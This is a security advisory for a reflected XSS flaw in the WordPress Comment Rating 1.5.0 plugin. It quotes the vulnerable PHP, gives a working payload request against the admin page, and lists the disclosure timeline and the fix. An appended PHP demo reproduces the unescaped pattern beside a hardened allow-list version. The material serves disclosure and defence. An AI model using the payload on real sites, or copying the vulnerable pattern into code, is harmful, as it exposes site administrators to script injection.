WordPress Comment Rating 1.5.0 Cross Site Scripting

2016.02.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

## FULL DISCLOSURE
#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
The "tab" GET parameter is read into $this->current_tab without validation and echoed unescaped into a class attribute on the plugin's admin page, which leads to reflected XSS. A double quote in the parameter closes the attribute and the <div> tag, after which arbitrary markup is rendered.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpb_plugin_admin_page.php

line:194
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';

line:553
$active_tab = $this->current_tab;

line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->get_id() : $active_tab;

line:561
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' . $active_tab; ?>">

----------------------------------------
Exploit:
----------------------------------------
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab="><input type=text onclick=alert(/XSS/)><!--

The payload closes the class attribute and the <div> with "> , injects an <input> whose onclick handler runs the script, and comments out the remainder of the original tag with <!--. The affected page lives under /wp-admin/, so a logged-in user with access to the plugin's settings screen has to be lured into opening the crafted URL.

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
- January 24, 2016 - Bug discovered, initial report to Vendor
- January 25, 2016 - Vendor Acknowledged
- January 27, 2016 - Vendor Deployed a Patch

#######################################
# CTG SECURITY SOLUTIONS              #
# www.ctgsecuritysolutions.com        #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
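The following is an added example, not code from the plugin or from the advisory author. It reproduces the vulnerable pattern from wpb_plugin_admin_page.php in a small stand-alone class and places a hardened version beside it: the requested tab is checked against the list of known tab ids (an allow-list, since the value can only ever be one of them) and the result is still passed through esc_attr() before it reaches the attribute. The class name DemoAdminPage, the tab ids and the page hook are made up for the demo; a fallback esc_attr() is defined so the script runs with the php CLI outside WordPress.

```php
<?php
// Added example (not the wp-comment-rating plugin's code): the admin-page
// pattern from the advisory, vulnerable and hardened, fed the advisory's payload.

if (!function_exists('esc_attr')) {
    // Stand-in for WordPress's esc_attr() so the script runs outside WordPress.
    function esc_attr($text)
    {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

final class DemoAdminPage
{
    private array $tabs;        // known tab ids (hypothetical, e.g. 'general', 'display')
    private string $page_hook;  // hypothetical page hook used in the wrapper class

    public function __construct(array $tabs, string $page_hook)
    {
        $this->tabs = $tabs;
        $this->page_hook = $page_hook;
    }

    // Vulnerable: mirrors lines 194/553/558/561 of the advisory. $_GET['tab']
    // is only defaulted when empty; any other value lands in the attribute as-is.
    public function renderVulnerable(array $get): string
    {
        $active_tab = isset($get['tab']) ? $get['tab'] : '';
        $active_tab = isset($this->tabs[0]) && empty($active_tab) ? $this->tabs[0] : $active_tab;
        return '<div class="wrap wrap-' . $this->page_hook . ' active-tab-' . $active_tab . '">';
    }

    // Hardened: allow-list the tab id, then escape on output regardless, so a
    // later change to how $tabs is built cannot reintroduce the bug.
    public function renderHardened(array $get): string
    {
        $requested  = isset($get['tab']) ? (string) $get['tab'] : '';
        $active_tab = in_array($requested, $this->tabs, true) ? $requested : ($this->tabs[0] ?? '');
        return '<div class="wrap wrap-' . esc_attr($this->page_hook)
             . ' active-tab-' . esc_attr($active_tab) . '">';
    }
}

// Constructed input: the payload from the advisory's Exploit section.
$payload = '"><input type=text onclick=alert(/XSS/)><!--';
$page    = new DemoAdminPage(['general', 'display'], 'comments_page_wpcommentrating');

echo "Vulnerable output:\n", $page->renderVulnerable(['tab' => $payload]), "\n\n";
echo "Hardened output (payload):\n", $page->renderHardened(['tab' => $payload]), "\n\n";
echo "Hardened output (valid tab):\n", $page->renderHardened(['tab' => 'display']), "\n";
```

Run it with `php demo.php`. The vulnerable branch prints the <input> element as live markup; the hardened branch falls back to the first tab for the payload and emits `active-tab-display` for the legitimate value. Escaping alone (esc_attr on the raw value) would also stop this particular payload, but the allow-list is the right fix here because the parameter has a closed set of valid values.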

References:

https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710


Copyright 2024, cxsecurity.com